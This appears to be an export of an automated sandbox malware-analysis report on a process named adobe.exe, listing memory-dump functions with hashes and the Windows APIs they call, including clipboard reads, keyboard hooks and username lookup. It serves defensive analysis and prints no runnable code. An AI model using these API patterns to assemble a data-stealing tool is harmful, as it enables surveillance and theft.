Opcode Fuzzy Hash: 3beabb0bfbc416722f8deede6d50749d54d6d0523f45ade7480a0d720d5c421e
Instruction Fuzzy Hash: BB110172F0010AEFEBA16A94E9481EDBFB0FB80744B204CA1D1C9BB184E27089708ED4

Function 06512E09 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b74f1e2aaca2532a9132219710bdc8de8d0c333b3ceff91233a9cf5301404c
Instruction ID: 16109b4a1804e92472794c93a4720a5ef2c0d7224542bbacea50e773d7edbb22
Opcode Fuzzy Hash: 78b74f1e2aaca2532a9132219710bdc8de8d0c333b3ceff91233a9cf5301404c
Instruction Fuzzy Hash: 4921CEB5D0134ADFDB10CFA9D984AAEBBF5BB48210F14842EE519A7300D375AA44CBA5

Function 02F3D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2283559261.0000000002F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2f3d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3726d79c79f1582b7cd14b74ad9978801607c0b17393bff080c82c24d3e41716
Instruction ID: ebac84bb3a794c96650b1fdcbfc19a83c8e65c7e06e945a22858adf1aeabd847
Opcode Fuzzy Hash: 3726d79c79f1582b7cd14b74ad9978801607c0b17393bff080c82c24d3e41716
Instruction Fuzzy Hash: 602192755093C09FCB03CF24D590715BF71EB46614F28C5DAD9498F2A7C33A980ACB62

Function 0651219B Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 904d466b77be1edea09dd43f268d6b8eeecc8cad84d900a1cfbfdc5607f043ed
Instruction ID: c2421239977eaff336c44bfd36ec470e4fe4747a0ac51df513f5e662f653f260
Opcode Fuzzy Hash: 904d466b77be1edea09dd43f268d6b8eeecc8cad84d900a1cfbfdc5607f043ed
Instruction Fuzzy Hash: 7E11C830E01304CFEB61EBB4D8A0AADBBF5FB89360F54006ACA059F241DB354E81CB51

Function 02F2D4C7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2283509877.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2f2d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction ID: 0b269ecc880fe58a6a04cd2f1955e361922652fa29d1d5b0a609f6140f961a46
Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction Fuzzy Hash: B7110372904240DFCB05CF10D5C4B16BF72FB84318F24C6A9D9090B356C33AD45ACBA2

Function 02F3D1E7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2283559261.0000000002F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2f3d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction ID: cf10c517db3876b1f0c2b0024bbbba0f792fd1e224ce5415321a3a8c3ce26321
Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction Fuzzy Hash: 7F119D75904284DFCB06CF50D5C4B15FFA2FB84318F24C6A9D9494B656C33AD45ACFA2

Function 06510949 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57d2a4042f6f1386ade3b98a7a59b87cc9ebde4994390444aa47ae66ec505f52
Instruction ID: e422e80bacbdd3bdc12366e63ebe2bb2526684ade7359344b0a62f5bc0b66821
Opcode Fuzzy Hash: 57d2a4042f6f1386ade3b98a7a59b87cc9ebde4994390444aa47ae66ec505f52
Instruction Fuzzy Hash: 8D113071E006268FDB40DF59C8605AEFBB5BF89710B05816AD959BB340EB70A980CBC0

Function 06510958 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fcea2103bb48e6af6000214d177fa542e51e857d8fa6dd1084a1bb0143e2d92
Instruction ID: b842063fda27cf6d50bfe4045bab011543360cd5dc4195804266fe83a5fd294d
Opcode Fuzzy Hash: 9fcea2103bb48e6af6000214d177fa542e51e857d8fa6dd1084a1bb0143e2d92
Instruction Fuzzy Hash: 12112E71E102268FEB44DF59C8605AEF7B1BF88710B05866AD959EB340EB70AD80CBC0

Function 065119A0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec686e2336dcf0854f324173b69cfddb6acb29a22cfd657f4c098566c00a3f05
Instruction ID: 40358d9e7828552fba0f2b18dfefdb6f4cbccef6b00062316439bd81c935921b
Opcode Fuzzy Hash: ec686e2336dcf0854f324173b69cfddb6acb29a22cfd657f4c098566c00a3f05
Instruction Fuzzy Hash: 20F0E23050A310CFE3169F38A8609667BB4FA5731174488ABD869CF252CA36D985C781

Function 06511138 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a16a7a8303322eaa2e21204aaa030d6b442bf95a810371dac0457f9da9d3cd2
Instruction ID: bcc04aad7e30596c491b9120a595eafa02f2c6c9a80ef02dc96afc403e4d17ae
Opcode Fuzzy Hash: 8a16a7a8303322eaa2e21204aaa030d6b442bf95a810371dac0457f9da9d3cd2
Instruction Fuzzy Hash: B5E0D83688A7514FEB71DF60AC817C9BBD0BB91211F19499BD190CB295C16C05858B82

Function 065100A0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a78140039d47bdd223192c6ac15031e42b2bba9aec5e78cb00033b4c756aa39
Instruction ID: 7f469befb1bec30abcbbbd9b444b861606520fc82ac2064533fe7f4412ccf574
Opcode Fuzzy Hash: 8a78140039d47bdd223192c6ac15031e42b2bba9aec5e78cb00033b4c756aa39
Instruction Fuzzy Hash: BCD02B3758411046F6B0E914BCC13D83341FBD5301F188C45F540DB144C51999824151

Function 06512ED1 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ec7426f4af767c43c0cd6beb09ef04e40691624cafaa1a04da83da5dc98b1c
Instruction ID: 233e37c7e62c9289b4e3702a3301df3932ca6de65fbfc9e4cdaa23e79cae3d01
Opcode Fuzzy Hash: 42ec7426f4af767c43c0cd6beb09ef04e40691624cafaa1a04da83da5dc98b1c
Instruction Fuzzy Hash: 4AE04F31042105DFD741EF60D905C8A3FA5BB45315B01C16AE0154F220C739C696DF42

Function 065121E8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a1f6d5d8604b02aca93ed427410d5ca885f53b0fd7b406fac30fdce2b71b9db
Instruction ID: 31dcd00a7f8c57789b0b8d8e83a6a718cfdd242e9bad0206071ec0b1563d3915
Opcode Fuzzy Hash: 7a1f6d5d8604b02aca93ed427410d5ca885f53b0fd7b406fac30fdce2b71b9db
Instruction Fuzzy Hash: FEE04F70941700CFD369DF60F950666B7E2BB45355B04D8BEC4A94F760CB36D881CB40

Function 06512DCF Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46abb31d5be14d8d5a24e0b5d50c30fe278a729ed37faafea2e7eb91cb336956
Instruction ID: 207c158650d1878e174355dcae1d20f930d8eb47046a1873a72e4373cf6be04c
Opcode Fuzzy Hash: 46abb31d5be14d8d5a24e0b5d50c30fe278a729ed37faafea2e7eb91cb336956
Instruction Fuzzy Hash: E1D05E325045556FC741AFD4E902B8ABFA9EB85215F08C06AD1588B122DA3AD1639782

Function 06512DE0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a918463338fa284d7cc8345d54e069a83f18e7e5e810e08fc494f4b3425d380d
Instruction ID: 76cde75606b4e66f62a4bddcfad623f75264f65592955fca0270db1e6fb81420
Opcode Fuzzy Hash: a918463338fa284d7cc8345d54e069a83f18e7e5e810e08fc494f4b3425d380d
Instruction Fuzzy Hash: 89C012321000197B4B41AB89D800C86BBADEF89654704C056E6088B121D622E55297D1

Function 06511EDD Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1841fe4d438dfee46ad012d2a7479381e42527a7218b6131106f1c358135ec
Instruction ID: f96e8de7b95ff1ae06a4ba152f6c9c68e082a871d76f9b8c87f92f0a914585cc
Opcode Fuzzy Hash: 2a1841fe4d438dfee46ad012d2a7479381e42527a7218b6131106f1c358135ec
Instruction Fuzzy Hash: 3FD0C97084520ADEFF208F90DA197AEBE70FB04304F200459E112B9051CB750A049FA1

Function 06511EF9 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2287911109.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6510000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc9ebf1cf0618eed10fe504462207a062c715ff3ccfc6e691aee83e88a39edb
Instruction ID: dffaf4ea7b4a15bc468fa994e51ff0a9f5b034ee47844869f5f97c7f2cf0bafc
Opcode Fuzzy Hash: efc9ebf1cf0618eed10fe504462207a062c715ff3ccfc6e691aee83e88a39edb
Instruction Fuzzy Hash: 55D0C97085530EDEFF208F90CA19BAEBE70BB04304F200409E102B9051CB7506049FA1

Analysis Process: adobe.exePID: 3804, Parent PID: 6776COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.5%
Total number of Nodes:	119
Total number of Limit Nodes:	14

Executed Functions

Function 017C6CD8 Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 017C6E13

Memory Dump Source

Source File: 00000005.00000002.2364135578.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_17c0000_adobe.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 2e5666c0b9e0bfcfc88bbb8d120cebb221021d1b5e4dba0f4b3ed2e953fb3df8
Instruction ID: 457d2426b39343c9a9e775e063e8c0ac336e3d8c46f0b1eddd5249bc4f7b69c9
Opcode Fuzzy Hash: 2e5666c0b9e0bfcfc88bbb8d120cebb221021d1b5e4dba0f4b3ed2e953fb3df8
Instruction Fuzzy Hash: E351E274E002588FDB18CFA9D894B9DFBB1BF48B10F14852EE815AB351DB74A884CF95

Function 06EF2741 Relevance: 1.0, Instructions: 1012COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52042fe22cae112930ca2ffc46b0e9f9315efaa9a45ec6a19f8a8e148cf03690
Instruction ID: 9a77c1005f6804433d76ed6cc108d539704420807550a8edea364d19241711e3
Opcode Fuzzy Hash: 52042fe22cae112930ca2ffc46b0e9f9315efaa9a45ec6a19f8a8e148cf03690
Instruction Fuzzy Hash: 22926830A103058FDBA4DFA8C584A9DB7F2FB89318F5494A9D609AB351DB35ED85CF80

Function 06EF6560 Relevance: .8, Instructions: 818COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb26ed703ac238dc9ff3058cce3bffa1b9afee2fd32facc0e162e6f9d770b620
Instruction ID: b3bd80f3ac7101ce1e176873e9e9fd1910c1ca092b012df46a6f665bf392010a
Opcode Fuzzy Hash: cb26ed703ac238dc9ff3058cce3bffa1b9afee2fd32facc0e162e6f9d770b620
Instruction Fuzzy Hash: 6062BD30B202059FDB54DB68D494AADB7F2FF88314F209429E606DB394DB35ED46CB90

Function 06EFC0F8 Relevance: .6, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29acc2e406a8bb8459c888899c3df8e16d21019a14f5250aa24f23530fb7f641
Instruction ID: c38c6f9f2ed6ac188981d95dd4bd97bbfc09db0d8dadeae5583125315c5dbc74
Opcode Fuzzy Hash: 29acc2e406a8bb8459c888899c3df8e16d21019a14f5250aa24f23530fb7f641
Instruction Fuzzy Hash: 6232B530B202098FDB54DB68E494BAEB7B2FB88714F309529E605E7391DB35DC46CB91

Function 06EF5550 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58215165b4c60bc700c39ffb7a86f7415a29faf1f5c15be4ae751d72742e4745
Instruction ID: e95e8be59c29fc5b068d3c47e1666792870b151704c0375002e3d2c2444c4d57
Opcode Fuzzy Hash: 58215165b4c60bc700c39ffb7a86f7415a29faf1f5c15be4ae751d72742e4745
Instruction Fuzzy Hash: 1A120431F203549FDB64DB64D88066EB7B2EBA5314F209839EA16DB385DB34EC41CB90

Function 06EFB198 Relevance: .6, Instructions: 570COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 857fe84d1d2fd10c8142e9bec1e5b2d4f098671dde51671b0c809e928a5ae45f
Instruction ID: 102d446a4d067dea9bc7def9389e6bdd2751282ca55b49449a70aa6aae90a71d
Opcode Fuzzy Hash: 857fe84d1d2fd10c8142e9bec1e5b2d4f098671dde51671b0c809e928a5ae45f
Instruction Fuzzy Hash: 55228530E202098FEF64DB68D4947AEB7B2FB89314F249926E509DB391DB35DC81CB51

Function 06EF3418 Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cfcdf98b1ee7f7180984f0af5ad472e7d616dfecca0d5d8f9d5231fa0a696d8
Instruction ID: cc84f06ea5746db64305215353cf56957ca98464a1fc4d56d3c7c1d612cfdedb
Opcode Fuzzy Hash: 5cfcdf98b1ee7f7180984f0af5ad472e7d616dfecca0d5d8f9d5231fa0a696d8
Instruction Fuzzy Hash: 5C323D30E1075ACFDB14EF75D89459DB7B2FF99300F209AAAD509A7214EB30AD85CB80

Function 06EF7CF8 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87fc8eda64fddfe840861e5b9fc6e1bcd5b49319a082531a642ff8b00174a2bd
Instruction ID: c1b7f1dc8035078fd0356c9494000f3e9ac60f3c9642ebfd544ace7e79cbf70e
Opcode Fuzzy Hash: 87fc8eda64fddfe840861e5b9fc6e1bcd5b49319a082531a642ff8b00174a2bd
Instruction Fuzzy Hash: 4502C330B112168FDB54DB64E894AAEB7F2FF89314F248428D506DB384EB35EC46CB90

Function 017C6CCD Relevance: 1.6, APIs: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 017C6E13

Memory Dump Source

Source File: 00000005.00000002.2364135578.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_17c0000_adobe.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 995a28d6c23e9aaa12e09abfbf0a8bff7de283e414d0e149424c64fba584c7c4
Instruction ID: b80b23d2a8f221cc495855200a1e48044304eabacbac31182b3f43e176903c58
Opcode Fuzzy Hash: 995a28d6c23e9aaa12e09abfbf0a8bff7de283e414d0e149424c64fba584c7c4
Instruction Fuzzy Hash: DA51E170E002588FDB18CFA9D894B9DFBB1BF48B10F14852EE815AB355DB74A884CF95

Function 06EE29F2 Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06EE2B0A

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8466334a4719c44bdbaa3a6e5989772ed5ee2f06a68478215f059615a819c6fe
Instruction ID: bb618729b2343bc663aa419eb55c2fb21f1dd207aa1495a84f3ebcef41b5442e
Opcode Fuzzy Hash: 8466334a4719c44bdbaa3a6e5989772ed5ee2f06a68478215f059615a819c6fe
Instruction Fuzzy Hash: 0451B0B1D00349DFDB14CFAAD884ADEFBB5BF48310F24852AE919AB210D7749945CF90

Function 06EE29F8 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06EE2B0A

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e00abfacce0dd2120ce9c6cb39562aa687f3011291df2e5349b381b4c87ab34e
Instruction ID: 327b278b21a99bc6358236a1ad0d5d06cda4ee55af98dd918d69c4bf39f9426f
Opcode Fuzzy Hash: e00abfacce0dd2120ce9c6cb39562aa687f3011291df2e5349b381b4c87ab34e
Instruction Fuzzy Hash: F241CEB1D00309DFDB14CFAAD884ADEFBB5BF48310F24812AE919AB210D774A945CF90

Function 06EE6464 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06EE7849

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 53987f0559c0f55f2d7ac8a03454cc26252d8d1597231915e567cf65775f5d89
Instruction ID: 9e4c27376dbc2b84d77c413586836b51d2746a550d5f967016a821cd5d88bd16
Opcode Fuzzy Hash: 53987f0559c0f55f2d7ac8a03454cc26252d8d1597231915e567cf65775f5d89
Instruction Fuzzy Hash: EB4136B4A00349DFDB54CF99D888AAABBF5FF88314F24C459D519AB321D374A841CFA4

Function 017CEDDD Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 017CEE7F

Memory Dump Source

Source File: 00000005.00000002.2364135578.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_17c0000_adobe.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 26ddb447f056ffb13cb68d92a24f9c14d20b6777ea50f384789fae6ea5074464
Instruction ID: a7e4ad29d6b0ea56a6dde36089ff8399f9f19078edbe66a675250feeef1c5c92
Opcode Fuzzy Hash: 26ddb447f056ffb13cb68d92a24f9c14d20b6777ea50f384789fae6ea5074464
Instruction Fuzzy Hash: 732173B1C002999FDB14DFAAD40479EBBF4AF48310F10856AE908A7340D7389901CFA1

Function 06EE84CC Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06EE8560

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 251906917aa5c5c0c78953c554944cbe0193982e7a554025a7e733cfdc991269
Instruction ID: ccf54fc714537157bc38438799976f0df08bca346c41ff9e451ec8bc82e1d816
Opcode Fuzzy Hash: 251906917aa5c5c0c78953c554944cbe0193982e7a554025a7e733cfdc991269
Instruction Fuzzy Hash: 113101B0D01348DFDB50CF99D984BCEBBF1AB48704F208059E405AB290DB749949CFA1

Function 06EE7E80 Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06EE8560

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 20460f9a5e5fff261e31d8b9f871ffc30c3d283a21c9dc2da07f7aa4a0120541
Instruction ID: 27b41dae570b516dd8a502cbe5932028e2357feea077a4ab24665b7c7fd59214
Opcode Fuzzy Hash: 20460f9a5e5fff261e31d8b9f871ffc30c3d283a21c9dc2da07f7aa4a0120541
Instruction Fuzzy Hash: CB310FB0D0130CDFEB50CF99C984BDEBBF5AB48704F208059E505BB290DBB4A849CBA5

Function 06EE68F0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06EE697F

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 156c073a45f43831a79c786b79260686b9aa51ad8e432ad21bf3e7d3bf0deed3
Instruction ID: 37bcd2e1656e49a34275a8b3ac3f28d61a1cc453b65ef78002a3e0db1876a344
Opcode Fuzzy Hash: 156c073a45f43831a79c786b79260686b9aa51ad8e432ad21bf3e7d3bf0deed3
Instruction Fuzzy Hash: 3121F4B5900349AFDB10CFAAD884ADEBFF8EB48310F14801AE954A3310C379A940CFA1

Function 06EE68F8 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06EE697F

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5880bd9f89870d60d7cd3420ab0aa668f6c65ed321840d1c724c3085f569c9d0
Instruction ID: d11ab40c181ca3e4fb7d8c5fd037c523a646bea6940a10c0a91c346ca4f12b3d
Opcode Fuzzy Hash: 5880bd9f89870d60d7cd3420ab0aa668f6c65ed321840d1c724c3085f569c9d0
Instruction Fuzzy Hash: 0121E3B5900349DFDB10CFAAD884ADEFBF8EB48310F14841AE918A7310D379A944CFA5

Function 06EEA020 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06EEA0A3

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 6929cbd43de01ec594b0b9ab95fea6dc8b6e17dcde1c8af087f0902b49fbc7bc
Instruction ID: 7687094e18acc7237f6a43629cf495356751c657868f168d8d56a59aad531759
Opcode Fuzzy Hash: 6929cbd43de01ec594b0b9ab95fea6dc8b6e17dcde1c8af087f0902b49fbc7bc
Instruction Fuzzy Hash: 25213871D002499FDB10DF99C844BDEFBF5AF88320F148429E455A7290D774A944CFA1

Function 06EEA028 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06EEA0A3

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

